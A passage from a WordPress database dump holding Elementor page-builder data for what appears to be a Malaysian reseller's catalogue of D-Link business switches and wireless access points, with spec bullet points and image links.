Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7529,3404,'_elementor_version','2.5.14'),(7530,3404,'_elementor_edit_mode','builder'),(7533,3405,'_wp_page_template','template-fullwidth.php'),(7534,3405,'_elementor_template_type','post'),(7535,3405,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":\"200\",\"bottom\":\"200\",\"left\":\"200\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible 